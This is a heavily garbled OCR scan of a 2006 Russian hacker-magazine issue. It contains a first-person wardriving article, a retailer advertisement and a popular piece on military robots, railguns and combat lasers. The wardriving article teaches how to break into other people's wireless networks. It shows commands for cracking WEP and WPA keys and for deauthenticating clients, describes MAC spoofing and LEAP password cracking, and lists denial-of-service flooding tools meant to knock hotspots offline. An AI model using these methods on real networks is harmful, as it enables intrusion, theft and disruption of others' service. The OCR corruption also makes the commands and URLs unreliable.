(І_5А53 и т.п.) для несанкционированного доступа, ты смо- 
жешь вторгнуться в просторы сети, украсть ценную ин- 
формацию, забекдорить пару компьютеров или же просто 
шпионить за их активностью. Если сеть имеет хороший 
внешний канал, актуально будет расставить ООоЗ-ботов. 
Словом, все зависит от твоей фантазии. 

О Расправляемся 
с защищенными соединениями 

Идем дальше. При просмотре карт мое внимание при- 
влекла точка с каналом 54 Мбит/с. Видимо, это была ка- 
кая-то корпоративная сеть, требующая быстрого соеди- 
нения. Действительно, сориентировавшись по карте, я 
выяснил, что это было туристическое агентство. Просто 
так подключиться к сети я не мог, препятствовала защита 
ѴѴЕР. Защитный механизм, прямо скажем, никудышный 
и за считанные минуты взламывается с помощью паке- 
та программ Аігсгаск ( ѵ\ллл/ѵ.аігсгаск-пд.огд ) или ѴѴерІ_аЬ 
( ИДр://ѵѵерІаЬ.зоигсеІогде.пеіЛ . Но об этом написано 
столько статей, что повторяться не вижу смысла — луч- 
ше посмотрим материалы на диске. Кстати, если пароль 
совсем легкий, можно попробовать дешифровать его 




прямо на лету с помощью новеньШй утилиты сНорсНор 
( ѵѵѵѵ\А/.пе^зШтЫег.ога/5Ііо\А/1Іігеаб.рІір?1= 12489 ). 
Большинство точек доступа в моих логах были защищены 
стандартом ѴѴРА (ѴѴі-Рі РгоіесіесІ Ассезз). Эта технология 
пришла на смену дырявому ѴѴЕР и обладает следующи- 
ми преимуществами: динамическая генерация клю- 
чей, четкое распределение криптографических сумм 
с помощью технологии МІС (Меззаде Іпіедгііу СНеск), 
препятствующее внедрению ложных пакетов, интегри- 
рованное шифрование по стандарту АЕЗ. Неплохо, но 
даже это не гарантирует 100% защиту сети, и заветный 
ключик по-прежнему можно подобрать: правда, для этого 
придется перехватить пакеты инициализации клиента в 
сети. По большому счету, разницы между взломом ѴѴЕР и 
ѴѴАР нет. Сначала в ход идет снифер Аігбитр (входит в 
пакет Аігсгаск). После запуска программы открывается 
диалоговое окно, в котором требуется выбрать беспро- 
водной адаптер, указать тип чипа сетевого адаптера и 
номер канала беспроводной связи (изменяется от 1 до 
14, но можно снифать все сразу, указав 0). Кроме этого, 
здесь задается имя выходного файла, в который будут 
складироваться перехваченные фреймы, и указывается, 
требуется ли снифать все пакеты целиком (сар-файлы) 
или же только часть пакетов с векторами инициализации 
(іѵз-файлы). Для взлома ѴѴЕР достаточно было бы пере- 
хватить только ІѴ5, но сейчас нам нужны абсолютно все 
пакеты. Поэтому на вопрос программы «Опіу ѵѵгііе ѴѴЕР 
ІѴз (у/п)» отвечаем отрицательно. После этого снифер 
начнет свою работу. 

Перехватить именно идентификационные пакеты можно 
двумя способами: либо просто дождаться, пока пользо- 
ватель отсоединится и вновь зайдет в сеть (то есть уст- 
роить засаду), либо умышленно отключить клиента от 
точки доступа, послав деаутентификационный пакет. К 
сожалению, средства ѴѴіпбоѵѵз этого не позволяют, зато 
подобный фокус легко реализуем под никсами с помощью 
утилиты ѴоісІ1 1 ( ѵѵѵѵѵѵ.ѵѵізес.пеі/ѵоісіі 1 Л : 



/оісі 1 1 _репеігаііоп -з КЛ ИЕНТСКИИ_МАС - В М АС_ТОЧ КИ_ДОСТУПА 



Не обязательно 
покупать сложный ОР5- 
приемник, достаточно 
иметь простую модель, 
которая показывает дол- 
готу и широту. Однако у 
выбранного приемника 
должен быть интерфейс 
с компьютером (обычно 
последовательным ка- 
белем), а выход должен 
быть совместим со стан- 
дартом ЫМЕА (ИаЛопаІ 
Магіпе ЕІесІгопісз 
Аззосіаііоп). 




> Все утилиты для 
вардрайвинга, а также 
массу информации ты 
найдешь на нашем РУР. 



в® 



Если нам удалось реконектить клиента, то пакеты иници- 
ализации окажутся в выходном файле Аігбитр’а: допус- 
тим, это дета.сар. Теперь скормим лог самой программе 
Аігсгаск: 



Сканировать сети и 
отмечать точки на карте 
Ооодіе ЕаіТИ очень удоб- 
но, но какие инструмен- 
ты могут использовать 
для этого линуксоиды? 
Отвечаю: отличной связ- 
кой является ОР5-демон 
СР8сІ (ИДр://арзсІ.ЬегІіоз. 
беЛ и сканер Кізпгіе* 
Сѵѵѵѵѵѵ.кізтеІѵѵігеІезз.пеЩ 
С помощью специаль- 
ных скриптов (Ийр:// 
рагкпаііоп.сот/дтар/) 
инфу о найденных точ- 
ках несложно наложить 
на карту Ооодіе ЕагіИ. 



аігсгаск.ехе -а 2 -ѵѵ ѵѵогсПізі.ІхІ: дета.сар 



Здесь ѵѵогбіізі.іхі — это словарь с паролями (чем больше, 
тем лучше), а ключ «-а 2» указывает на то, что взламы- 
вать мы будем защиту ѴѴРА. Если повезет, то уже через 
несколько часов программа выдаст тебе заветный клю- 
чик. Но это возможно только при условии, что в словаре 
был нужный пароль. Что касается ѴѴРА2 (следующая вер- 
сия ѴѴРА), то это почти приговор. Используемые методы 
практически исключают возможность подбора, поэтому с 
такой точкой лучше сразу распрощаться. 



> Будь осторожен, опытный 
админ может сбить тебя и 
поднять фейковую точку 
доступа! И при соблюдении 
некоторых условий даже 
отследить тебя! 
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О Спуфинг МАС 

Ноутбук тем временем постепенно разря- 
жался, поэтому я решил поторопиться на 
скан других территорий. Идем в сторону Лу- 
бянки. Найденные точки доступа поголовно 
фильтровали подключения по МАС-адре- 
сам. Подключиться ктаким АР, по идеи, могут 
только клиенты, которые занесены в список 
доверенных машин. Но это только по идеи. 
Обойти подобную защиту — проще просто- 
го, нужно лишь сменить МАС-адрес своего 
беспроводного адаптера на доверенный, ко- 
торый легко определяется все той же утили- 
той аігобитр. Для смены МАС’а существует 
немало утилит, в том числе платная ЗМАС 
( ѵѵѵѵѵѵ. кІссопзиІііпа.пеі/зтасЛ и бесплатная 
ТесНпШит ѵЗ.1 ( ѵѵѵѵѵѵ.ІесНпіІіит.сот ). Обе 
требуют лишь выбрать сетевой адаптер 
и указать для него желаемый МАС-адрес. 
Убедись в том, что адрес успешно сменился 
(команда ірсопЛд /аІІ в консоле) и попробуй 
установить соединение. К сожалению, с 
первого раза ты можешь легко обломаться, 
поскольку авторизированный клиент может 
быть уже подключен к сети. Выселить его 
оттуда поможет все та же программа ѴоісІІ , 
послав деаутентификационные пакеты. 

□ Везде липа 

Мне попалась одна интересная точка: ни один 
из предыдущих способов проникновения не 
подходил. В колонке Ѵепсіог красовалось 
слово СІЗСО. Это заставило меня вспомнить 
о протоколе авторизации І_ЕАР (Ыдіііѵѵеідііі: 
ЕхіепзіЫе Аиібепйсаііоп РгоіосоІ), разрабо- 
танном компанией СІЗСО. Чтобы убедиться 
в том, что мои догадки верны, я решил про- 
анализировать все пакеты, перехваченные 
снифером. В этом мне помог ЕІНегеаІ ( ѵѵѵѵѵѵ. 
еіНегеаІ.сот Т мой любимый пакетный сни- 
фер/аналайзер. Немного погодя, пакеты 

> С помощью Кпздепл можно не только 
отметить точки доступа, но и графически 
показать их радиопокрытия. Впечатляю- 
щее зрелище! 



> Идеальная привязка: информация об АР прямо на фотографиях со спутника. Погреш- 
ность не более 20 метров. 



отобразились на экране, где в поле инфо 
было ВЕОІІЕЗТ, ЕАР-СІЗСО ѴѴігеІезз (І_ЕАР). 
Значит, я был прав. 

Г лавная особенность І_ЕАР состоит в том, что 
для авторизации нужен не только пароль, но 
и имя пользователя! По умолчанию в ѴѴіпбоѵѵз 
этот протокол не поддерживается, поэтому 
для работы потребуется установить специ- 
альный клиент — Аігопеі СІіепі ШІШез ( ИНр:// 
гогзсбасіі.сопсогсііа.са/пеа/гетоіе ассезз/ 
ѵѵігеіезз/депегаі іпіо/аси.ІпІтП . А есть ли 
смысл его устанавливать? Конечно! Несмот- 
ря на продуманность протокола, даже в нем 
обнаружили уязвимости, позволяющие легко 

ЗАЙМЕМСЯ ЗАПАДАОСТРОЕНИЕМ 



подобрать пароль с помощью перехваченных 
пакетов І_ЕАР-авторизации. Первым это про- 
нюхал Оозбиа ѴѴгідНі, разработчик утилиты 
АЗІ-ЕАР ( ННрѴ/азІеар.зоигсеІогае.пеіЛ . кото- 
рая перехватывает сетевые пакеты при пов- 
торном коннекте клиента, после чего брутит 
пароли для идентификации. 

О Занимайся спортом 

Все полученные знания приведены только в 
целях ознакомления и использовать их нужно 
исключительно для поиска открытых хотспо- 
тов. Помни, что взлом — это адреналин, новто 
же время и уголовная ответственность. И-і 

р 






Если проникнуть в сеть не удается, то можно 
устроить небольшой беспредел. Идея состо- 
ит в том, чтобы отключить с помощью специ- 
альных пакетов клиентские машины от точки 
доступа, которые будут стараться возобно- 
вить соединение — так будет сгенерирован 
трафик. Подобного рода затяжная атака 
может навредить админу или же нарушить 
бизнес какой-либо интернет-забегаловки, 
так как сеть некоторое время будет абсолют- 
но недоступна и на мониторах в трее будет 
гореть «ѴѴігеІезз ІЧеіѵѵогк ипаѵаіІаЫе», как 
звезда одной из Кремлевских башен. А вот и 
инструменты: 



фреймов деаутентификации, деассоциации 
или, вообще, некорректных фреймов иденти-^ 
фикации — все это реально затормаживает 
работу хотспота. 

Аігеріау ( ѵѵѵѵѵѵ.ѵѵігеІеззсІеІепсе.огд/Сопіепіз/ 
Аігсгаск аігеріаѵ.ілііт ^ инжектирует любые 
фреймы в эфир. 

ѴоісІ1 1 (ѵѵѵѵѵѵ.ѵѵізес.пеі/ѵоісіі 1 Л — незамени- 
мая тулза, с помощью которой можно зава- 
лить ѴѴі-Рі сеть. Подробности — в статье « Воз- 
душный отказ» («Хакер», номер #080). 




МАСЛІоосІ ( ИНрѴ/Іпоте.іѵѵи.есІи/іѵѵгіаІіІ/регІ. 
Ыт) предназначена для отправки пакетов с 
множеством сгенерированных МАС-адре- 
сов. Использование: 

$регІ тасШ.рІ-с 1000 -и 10000 (с — количес- 
тво пакетов, и — таймаут). 

РАТА Оаск ( ѵѵѵѵѵѵ.ѵѵіЛоо.сот/зоШаІІаскЛаІа 
Іаск.с ) посылает в эфир большое количество 



І_ОЯСОІ\І ( ѵѵѵѵѵѵ. 802.1 1 тегсепагу.пеі/ІогсопЛ 
— новая утилита, полезная для поиска оши- 
бок в драйверах для беспроводных девай- 
сов и в самом стандарте 802.1 1Ь. Будучи 
представленной на конференции ВІаскРІаі 
ІІ5А 2006, тулза вызывает всевозможные 
переполнения карт ѴѴІ_АЫ специальными 
фреймами іиггіпд, при этом хакер получает 
возможность выполнить неавторизирован- 
ный код. 



Іг* 



/048 



ХАКЕР 09 /93/ 06 






Во Власти Качества 

Идеальное изображение 
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( 495 ) 970 - 13-83 
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МОСКВА; Аксиііж [495) 794-72-24 Аркм (495) 9№И-07, Белый №тер ЦИФРОВОЙ (495) 730-30-30 Дшіййм (495) №9-22-22. Ингшйн (495) 941-91-61. 
Компании Мир И 95) 78500-00, М Ввдео (495) 777-77-75, НвоТорг (495) 363-36-25 Никс (495) 216-70-01, Одди (495) 284-02-36, 

Рад>юкомп 0 кт-компыотер (495) 953-51 -75,СетЕвал Лаборатория (495) 794-64-90. СгартМастер (495 ) 967-15-15; Ф-Цеитр (495) 105-54 47. 

Левіед Сотриіега (495) 970-МЫН; N1 Согприіег [495) 976 19 зр. Раіапа (495) 73ММ7; Ш ЕкА Икіпмікгь (495) Пь ?Ь ЬБ ЦЙМ СйгориТегз (495) 771 /?ЙѲ 
БАРНАУЛ: Компаніи Мэйпп (38Ь2) 24 45 5? К I рейд 43657) 5569 ПО БЛАГОВЕЩЕНСК: К-ЙІѢЛ (416?) 37-5Б5Б ВЛАДИВОСТОК: П*ЛІ (4?Э?) Д6 04 Ь4 
ВОЛЖСКИЙ; КИ&ир (3443) 31-35-50, ЕКАТЕРИНБУРГ; Белый ВОИф (343) 377-55-15, ИРКУТСК; КоМ1ш-КвМ№»й№рС (3952) 25-53-ЭѲ, 

КАЗАНЬ; Алгоритм (6432} 73^77-32. КИРОВ; ТслПром (5332) 35-13-25. КРАСНОДАР; ВЯвдос (5612) 15-16-01, Окей КсМЯыетср (№12} 15-11-44 

КРАСНОЯРСК: Аверс < 36-12) 560-561 . Компании Старком(Э912) 52-33-99. НИЖНИЙ НОВГОРОД: ЮСТ <8312) 76-55-76 НОВОСИБИРСК: Диадема 13632) 35-62-73. 
Зет НСК [3532) 12-51 4?; Компания Гетти (3632) 114М-12; Левел (3632) 26-9645, ОМСК: Бизнес Техника (3812) 23-33-77, Инсист (3832) 53-16-17 
ПЕРМЬ: ГАС КСШ (3477) ЗБ 37-75; Матрица (3472) 108 ПК; ПЕНЗА: Формоза (6417) 54.40-42; РОСТОВ-НА-ДОНУ: Зенит (6637) Л?.Б6 Ь6. 

Іетнополнс (563?) 90 31 11. ОпМтдОе (063?} 97 ДО 14. САРАНСК: ООО *Нанкьгатйрн (ЙД4?) 3? 8? &7; Іаст [634?) 74 Оіі 91. САРАТОВ: АТТО (Й4Б7 ) 44 41 11. 
КемпьЮМйріЮГ [5452) 26-13-14 САМАРА; Аксус (5462) 70-93-11. ПЕОС [5462) 70-55-65 Прагма (6462) 70-17-51, ТОЛЬЯТТИ; Олиимз (5482) 25-004)6, 
Прагма ІѲ462) 75-17-01, ТОМСК; Иннгіі (3822) 56-00-55, ТЮМЕНЬ: Арсенал (3452) 48-47-74; УЛАН-УДЭ: Сн&КНый Барс (3012) 43-00-00. ФржиЭМ (3012) 55-1 9-1 Ѳ, 
УЛЬЯНОВСК: ООО Изданье* [6422) -11-26-52: УФА: Кпамас (3472) 61-21-12: ЧЕЛЯБИНСК: Дайее-р (3512) Э44Й-9Э. Найфя (3512) 61-22-91. 

Нк-кас-ЭВМ (3512) 32-65-50; 
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Военные игрушки 
нового времени 



О «НЕСТАНДАРТНЫХ» 
СИСТЕМАХ ВООРУЖЕНИЯ 
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ГОНКА ВООРУЖЕНИЙ — ОДНА ИЗ КЛЮЧЕВЫХ ЗАДАЧ ВОЕННОГО МИНИСТЕРСТВА ЛЮБОЙ СТРАНЫ. НАУКА И ТЕХНОЛО- 
ГИИ, КАК ПОВЕЛОСЬ С НЕЗАПАМЯТНЫХ ПЕЩЕРНЫХ ВРЕМЕН, ИЗНАЧАЛЬНО ПОЛУЧАЛИ САМУЮ МОЩНУЮ ПОДКОРМКУ 
ИМЕННО ОТ ВОЕННЫХ. И ДЕЛО НЕ ТОЛЬКО В ДЕНЬГАХ, А СКОРЕЕ В БЫСТРОМ ПЕРЕТЯГИВАНИИ «ЗАУШИ» ЛАБОРАТОР- 
НЫХ ИССЛЕДОВАНИЙ И ПРОТОТИПОВ НА ПОЛИГОН. ПРОЦЕСС Р8Ю В ОБОРОННОЙ ПРОМЫШЛЕННОСТИ — САМЫЙ СКО- 
РОСТНОЙ И ПО БЫСТРОТЕ ВНЕДРЕНИЯ НЕ УСТУПАЕТ ДАЖЕ МИКРОЭЛЕКТРОНЩИКАМ. 



ело еще в том, что, кроме возмож- 
ности попугать потенциального 
I I противника, убийственные новин- 

ки можно просто продать, хорошо на этом 
заработав. 

□ Сокращение биомассы 

Тенденция перехода с органики на железо 
наметилась еще в середине прошлого века. 
Мотивы вполне понятны: железо не спит, не 
дезертирует, а самое главное — его родствен- 
никам не надо будет платить страховку, если 
его уничтожат в ходе военных действий. 

Эти достаточно сильные стимулы заставили 
военных еще в прошлом веке начать констру- 
ировать опытные и серийные образцы «же- 
лезных солдат». Естественно, робототехника 
была еще в зачаточном состоянии, поэтому 
конструкторы могли предложить только бес- 
пилотные машины. Первыми отличились во 
времена Второй мировой войны немцы и ита- 
льянцы: они сделали радиоуправляемый ка- 



тер, нашпигованный взрывчаткой, детониру- 
ющей при столкновении с вражеским кораблем. 
Однако хитрые противники быстро раскусили 
немцев и расстреляли катера-бомбы до того, 
как они к ним подплыли. 

После ряда неудач в области дистанционно 
управляемых машин мировые усилия сосре- 
доточились на развитии ракетной техники. 
Неудивительно, что у конструкторов середины 
прошлого века не получалось сделать авто- 
номную беспилотную боевую единицу — ки- 
бернетика и электроника были тогда развиты 
достаточно слабо. 

Но пришли 90-е, и с созданием первого амери- 
канского беспилотного самолета-разведчика 
ОІоЬаІНаѵѵк началось бурное развитие «желез- 
ных» военных машин. Помогли этому не только 
микроэлектроника, интернет и кибернетика, 
но и система ОРЗ-навигации, которая очень 
упростила управление киберсолдатами. 
Сегодня все машины, способные вести воен- 
ные действия можно грубо поделить на две 



категории: роботы различных платформ, ко- 
торых можно быстро переоборудовать под 
текущие военные нужды, и традиционная 
военная техника, из которой водителя «выта- 
щили», а вместо него вставили дистанционно 
управляемые электронные мозги. О дистан- 
ционно управляемых машинах мы поговорим 
ниже, а вот военные роботы сегодня — акту- 
альная тема. 

Первые боевые роботы, созданные военным 
холдингом ОіпеШ (Згоир РІ_С, принадлежа- 
щим сразу военным ведомствам и США и Со- 
единенного Королевства, начали действовать 
в Ираке и Афганистане. Назвали опытное дети- 
ще ТАІ_ОІ\І, что в переводе означает «коготь». 
Самые первые механические друзья солдат 
были мирными — они осуществляли в Афга- 
нистане разведку местности и несли на себе 
медицинское оборудование для оказания пер- 
вой помощи. Но после того, как военные оцени- 
ли способности железяк, на них начали ставить 
оружие. В первую очередь — пулеметы. 




/ 050 



Ш Щ I 

Ш ѵ?! € 

1 щ % 
т і і 
і ® * 
® ® і 

ш Ш і 

ш т і 

і 

і 



ХАКЕР 09 /93/ 06 







Щ Ш Щ 
Ші С-В 
Щ Ш Ш 




И Ш @ @ @ @ @ @ % Р Щ Р @ Щ Р Р Р 

ш ш ш ш ш ш ш ш ш ш ш ш ш ш ш ш ш 

ШШШШШШШШШШШШШШШШШ 
11111 111111111111 



® 1® і® і® 

%**!■ Щі 

1 1 1 1 

р р р р 

1 1 р в 



1 р р р р 
р р р р р 
1 1 1 1 1 




р р р р р р р 

1 1 1 1 1 1 1 

Р 'С '* $ О 'Н 



® ® т ш ш т ш ш 
в ® щ в в ш т ш 
т ш, ш т т т ® ® 



1 


® ® 


® 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


1 


ѣ ѣ 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


1 


® ® 


® 


8 


8 


8 


8 


8 


8 


1 


8 


8 


8 


8 


8 


8 


8 


8 


8 


1 


1 ® 


® 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


1 


® ш 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


® ® 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


1 


1 


8 


8 


8 


8 


® 


8 8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


1 


8 


® 


8 ® 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


8 


1 


1 








Запчасти для 5ЕР 



40 » 

м 








Теперь «когти» переименовали в «мечи» 
— ЗѴѴОРЮЗ (ЗресіаІ ѴѴеаропз ОЬзегѵаііоп 
Ресоппаіззапсе Эеіесйоп Зузіетз). И все бла- 
годаря легкому пулемету М249 калибра 5,56 
миллиметров (750 выстрелов в минуту). А на 
некоторых «мечах»даже установили средний 
пулемет М240 калибра 7,62 (700-1000 в мину- 
ту). Без перезарядки робот-меч может произ- 
вести 300 и 350 выстрелов. 

Однако, если ты думаешь, что роботы самосто- 
ятельно ведут отстрел врагов, то сильно оши- 
баешься. Как разведчики, они действительно 
действуют автономно, но с появлением на их 
борту высокоскоростного пулемета ими все 
время руководит солдат-оператор. И нажима- 
ет на курок именно он. Это неудивительно. В 
Ираке, кроме враждебного населения, есть 
еще женщины и дети, так что задачу отделе- 
ния зерен от плевел в таком жизненно важном 
вопросе роботу доверять пока рано. 

Работа солдата-оператора отчасти похожа на 
игру в шутер. Отличие только в том, что враги 
тут реальные. Оператор может даже восполь- 
зоваться шлемом виртуальной реальности, 
чтобы полностью «срастись» с «мечом». 

В будущем ОіпеііО Огоир РІ_С всерьез за- 
думывается отом, чтобы снабдить роботов 
переоборудованными платформами, бла- 
годаря этому ТАБОЫ’ов ЗѴѴОВЭ’ов можно 




будет проапгрейдить прямо на поле боя, 
используя подручное оружие. 



□ Рэйлган в космосе 

Тебе, я думаю, не надо объяснять удобство 
и эффективность оружия рэйлган. При- 
нцип действия прост до безобразия: ме- 
таллические стержни, сильно ускоренные 
электромагнитным полем, выстреливаются 
в направлении врага. Чем быстрее летит 
железяка, тем эффективнее наносит пов- 
реждения. Сделать рэйлган сегодня 
не составляет большой проблемы. 

Но дело в том, что его размеры будут 
сопоставимы с небольшим сараем. Для 
хорошего разгона катушкой-индук- 
тором рельсы нужно очень много энергии, 
а поэтому надо обзавестись персональной 
электростанцией. Естественно, такое тас- 
кать на себе никто не будет, по крайней мере, 
пока не появятся ультракомпактные высоко- 
энергетические батарейки. 

Так что пока можно забыть о персональных 
рэйлганах. Зато ничего не мешает поставить 
такую установку на танк или морской крей- 
сер. Затраты на боеприпасы почти нулевые, 
а эффективность выше. 

Есть еще один очень оригинальный проект рэй- 
лгана. Тут не понадобятся даже высокие энер- 



гии — матушка-Земля сама выступает в роли 
вечных батареек. 

Есл и ты ко гд а- н и буд ь хул иганил,тознаешь,как 
лихо кидать что-нибудь вниз с девятиэтажки — 
бомбовый эффект обеспечен. Физика гласит, 
что чем выше запрешь что-либо, тем выше его 
потенциальная энергия, которая при падении 
превращается в кинетическую, а при ударе об 
землю — вообще в тепловую. Вывод: рэйлган 
эффективнее всего разместить на орбите, и 
кидаться камнями и рельсами оттуда. 

Как бы ни комично выглядели эти рассужде- 
ния, Пентагон их принял всерьез (физику-то 
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полѳ боя засверкают невидимые световые 
молнии. Однако только после открытия ла- 
зеров ученым стало ясно, что боевой лазер 
— дело отдаленного будущего. 

Не прошло и полвека, как первый боевой ла- 
зер все-таки сконструирован! Он находится 
в Лаборатории имени Лоренса Ливермора 
(І_аѵѵгепсе Ыѵегтоге І_аЬогаіогу) в США. Его 
мощности хватает, чтобы прожечь 2,5-санти- 
метровую железную пластину всего за две се- 
кунды. Этот полупроводниковый лазер дела- 
ет 400 высокоэнергетических «выстрелов» в 
секунду. Такой мощности уже достаточно для 
военного применения. Однако у лазера есть 
недостаток — большие габариты и масса. 
Вообще, лазерного оружия пока намечается 
три типа: химические лазеры, лазеры на элект- 
ронных ускорителях и полупроводниковые. 
Пока единственный бич, препятствующий 
появлению большинства проектов лазерного 
оружия на поле боя, — высокое потребление 
энергии. 

Эксперты единогласны во мнении, что мощ- 
ность боевого лазера должна составлять не 
менее 100 киловатт. Пока же Пентагон смот- 
рит, кто первым достигнет порога в 25 киловатт. 
Уже в 2004 году мощность экспериментальных 
боевых лазеров достигла 50 киловатт. 
Конструкция этого сверхмощного лазера 
имеет несколько интересных особенностей. 
Во-первых, лазерная установка обладает 
модульной структурой — для наращивания 
мощности нужно большее количество грана- 
товых кристаллов и светодиодов, служащих 
источниками света, возбуждающего атомы в 
кристаллах. 

Но бесконечно наращивать мощность не по- 
лучается из-за перегрева кристаллов. Тогда 
они быстро деформируются, и происходит 
искажение ударного луча. 

Частично эту проблему решили при констру- 
ировании боевого лазера ТНЕІ_ (ТасіісаІ НідІл 
Епегду І_азег — тактический высокоэнерге- 
тический лазер). ТНЕІ_ — химический лазер 
на фториде дейтерия. Для накачки лазера 
используется фторид азота, этилен и пере- 
кись водорода. Он конструктивно состоит из 
двух или трех компактных силовых лазерных 
установок, и когда одна перегревается, в ход 
пускается вторая, а за ней — третья. 

Но несмотря на технические трудности, бое- 
вые лазеры уже находятся в строю. Одни из 
них устанавливаются на прототипах снайпер- 
ских винтовок и могут ослеплять противника, 
другие настолько велики, что для их пере- 
мещения нужно несколько грузовиков или 
транспортный самолет. 



не обманешь) и задумал сделать орбитальное 
кинетическое оружие точного наведения. 
Проект назвали Побз Ргот (Зоб, что по-наше- 
му может звучать как «Стрелы Бога». Сначала 
он воспринимался военными неоднозначно 
— достаточно вспомнить, как недоверчиво 
отнеслись в свое время к знаменитым «Звез- 
дным Войнам» одного из президентов США 
Рональда Рейгана. Но потихоньку здравый 
смысл начал проникать в умы штабистов — и 
началась медленная разработка орбитально- 
го проекта. Теперь уже известно, что первые 
орбитальные рэйлганы появятся не раньше 
2015 года. Об этом заявили ВВС США в докла- 
де о перспективах развития оружия косми- 
ческого базирования в 2003 году. 

Одна платформа Яосіз Ргот СосІ будет состо- 
ять из двух низкоорбитальных спутников, один 
из которых непосредственно ведет огонь и 
является при этом хранилищем боеприпасов, 
второй — станцией слежения и наведения на 
цель. Одно из преимуществ орбитального 
оружия состоит в том, что им можно поразить 
любую стационарно расположенную на по- 
верхности Земли мишень. 

Сами стрелы есть не что иное, как вольфра- 
мовые стержни длиной 6, 1 метра и диаметром 
30 сантиметров, несущие простейшую элек- 
тронику для управления аэродинамическими 
рулями на конечном этапе наведения непос- 
редственно перед поражением цели. 

После несильного выстрела из орбитальной 
пушки стрелы входят в атмосферу на скорости 
1 1 километров в секунду, выдерживая нагрев 
за счет специаль- 
ного теплозащит- 



ОЛазерные войны 

Еще до открытия лазера в 60-х годах, фан- 
таст прошлого века Г ерберт Уэллс оснащал 
пушками с «тепловыми лучами» захватчи- 
ков-марсиан. Через некоторое время по- 
явился знаменитый инженер Гарин и его 
разрушительный гиперболоид. В оптимис- 
тичные 30-е годы казалось, что скоро и на 



ного покрытия. 
В нижних слоях 
атмосферы их 
скорость пада- 



Космическое оружие 



достаточно вы- 
сокой, чтобы 
испарить цель при столкновении, превра- 
тив весь запас потенциальной энергии в теп- 
ло. Время полета стрелы от спутника до цели 
составляет не более 1 5 минут. 

Разработкой стрел и системы орбитального 
базирования занимается военная компания 
РАЫЭ, которая впервые предложила идею 
кинетического оружия в 1 950 году. Однако во 
время ядерной гонки об этой идее забыли и 
вспомнили только сегодня, когда пользовать- 
ся напрямую ядерным оружием нельзя. 
Кинетические рэйлы военные уже испы- 
тывали (правда, не с орбиты, а с помощью 
пушек-ускорителей) в 2003 году. Снаряд 
длиной менее метра и весом 1 8 килограммов 
разгонялся до скорости более 6М (М — чис- 
ло Маха, равное одной скорости звука; 6М 
— более 2,5 километров в секунду) и по высо- 
кой дуге уходил в верхние слои атмосферы, 
чтобы через несколько минут обрушиться на 
цель. У цели скорость составила более 1,5 
километров в секунду. 

Еще одно преимущество кинетических снаря- 
дов — их низкая стоимость и абсолютная бе- 
зопасность в эксплуатации. Такими болван- 
ками можно загрузить любой военный склад 
без опасений, что он взлетит на воздух. 
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Основной производитель лазерного оружия США — ком- 
пания ІМоіНягор Огиттап. Эта конторауже не один десяток 
лет делает высокотехнологичное оружие, которое хоро- 
шо себя зарекомендовало. 

Военное применение больших боевыхлазеров началось 
с проекта реструктуризации американской системы 
противоракетной и противовоздушной обороны. Ока- 
зывается, сбивать самолеты и ракеты лазером гораздо 
дешевле, чем выпускать по ним ракеты, стоимость ко- 
торых в несколько десятков раз превышает стоимость 
одного лазерного выстрела (который, кстати, обходится 
тоже недешево). 

Первые попытки сбить высокоэнергетическим химичес- 
ким лазером ракету были предприняты именно ІМоЛНгор 
Огиттап. НаВоеіпд-747 благополучноустановилилазер 
ТНЕІ_ с хитроумной оптической системой, позволяющей 



«крутить» лазерный луч и точно наводить 
его на цели. Этот агрегат сбил несколько ракет, направ- 
ленных в сторону самолета и даже сумел обезвредить 
ракету-мишень, символизирующую баллистическую 
ракету. 

В будущем ІМогіІігор Огиттап хочет оснастить системами 
лазерной защиты самолеты-бомбардировщики, чтобы 
сбивать ракеты системы «воздух-воздух». 

Представь себе, как это классно: летит бомбардировщик, 
против него выпускают стаю ракет. Автоматическая ла- 
зерная установка на борту этого самолета благополучно 
сжигает все эти ракеты — и самолет летит дальше. 

Аесли против него вылетают истребители, то лазерная ус- 
тановка наносит удар по какому-нибудь уязвимому месту: 
по топливным бакам, ракетам под крыльями или даже по 
кабине пилота. Истребитель падает, а летучая крепость с 
лазерными пушками продолжает лететь по расписанию. 
Из-за большого веса и габаритов силового лазера ТНЕЕ 
его невозможно установить, к примеру, на истребителе. 
Зато ничего не мешает поставить лазер на бомбардиров- 
щик, транспортный самолет или на штурмовик АС-130. 
Можно еще на боевые дирижабли, если они к тому време- 



ни появятся. 

А мини-лазеры для ос- 
лепления личного со- 
става планируют поста- 
вить на боевые машины 
Нитѵее. 

Месяц назад КІогіИгор 
Огиттап представила 
еще одну лазерную но- 
винку — систему назем- 
ного ПВО ЗкудиагсІ. 

Это высокомощная ла- 
зерная установка на ос- 
нове того же химическо- 
го лазераТНЕІ_ вместе с 
системой слежения и 
наведения, 
располага- 
ющаяся в 
двух воен- 
ных грузо- 
виках. Такой комплекс ПВО можно развер- 
нуть на местности буквально за несколько 
часов. 

Благодаря сверхмощному химическому лазе- 
ру платформа может контролировать сектор 
неба радиусом до 10 километров! Представь 
себе: с помощью несколькихсистем ЗкудиагсІ 
можно окружить защитным колпаком целый 
город! Система полностью автоматизиро- 
вана, в отличие от управляемых сол- 
датами ранних прототипов лазерных 
установок. 

ЗкудиагсІ можетсравнительно быстро 
разворачиваться всторону цели иточ- 
но ее удерживать благодаря системе 
слежения. Подготовка к выстрелу ведется в несколько 
этапов. Сначала цель обнаруживает радар и передает 
координаты компьютеру лазера. Компьютер начинает 
«грубое слежение», разворачивая лазер всторону цели, 
а уже затем — «точное». После того как цель уверенно 
отслеживается в течение некоторого времени, компью- 
тер лазера дает команду на выстрел. Цель облучается 
лазером до ее полного разрушения. 

Полевые испытания системы уже проведены компанией, 
и в них она довольно хорошо себя зарекомендовала. Так, 
ЗкудиагсІ отражала ряд боевых целей, представляющих 
собой ракеты коротких и длинных дистанций, направлен- 
ных на нее в случайном порядке. 

Луч лазера настолько мощный, что нагревает пыль и кап- 
ли воды, находящиеся в воздухе, поэтому со стороны мож- 
но увидеть «выстрел лазера». 

Система ПВО ЗкудиагсІ будет производиться массово. Од- 
нако стоимость готового изделия может быть недетской. 
